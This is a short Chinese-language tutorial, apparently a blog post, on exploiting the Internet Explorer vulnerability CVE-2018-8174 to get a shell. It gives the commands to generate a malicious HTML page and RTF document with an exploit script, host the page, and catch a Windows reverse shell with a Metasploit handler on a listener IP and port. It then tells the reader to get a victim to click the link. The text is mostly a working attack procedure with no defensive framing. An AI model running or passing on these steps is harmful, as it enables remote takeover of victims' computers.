利用0DAY漏洞CVE-2018-8174获取shell

CVE 2018 8174 漏洞影响最新版本的 IE 浏览器及使用了 IE 内核的应用程序。用户在浏览网页或打开 Office 文档时都可能中招，最终被黑客植入后门木马完全控制电脑。微软在 2 018 年 4 月 20 日早上确认此漏洞，并于 2018 年 5 月 8 号发布了官方安全补丁，对该 0day 漏洞进行了修复，并将其命名为CVE-2018-8174

上传CVE-2018-8174_EXP master.zip

unzip CVE-2018-8174_EXP master.zip

python CVE-2018-8174.py -u http://192.168.3.24/exploit.html -o hack.rtf -i 192.168.3.24 -p 4444

-u url地址 -o生成文档 -i监听地址 -p 监听端口

cp exploit.html /var/www/

启动万能的msf

use exploit/multi/handler

exploit(multi/handler) > set payload w indows/shell/reverse_tcp

run

让受害者点击恶意链接

http://192.168.3.24/exploit.html

获得最高权限

好水……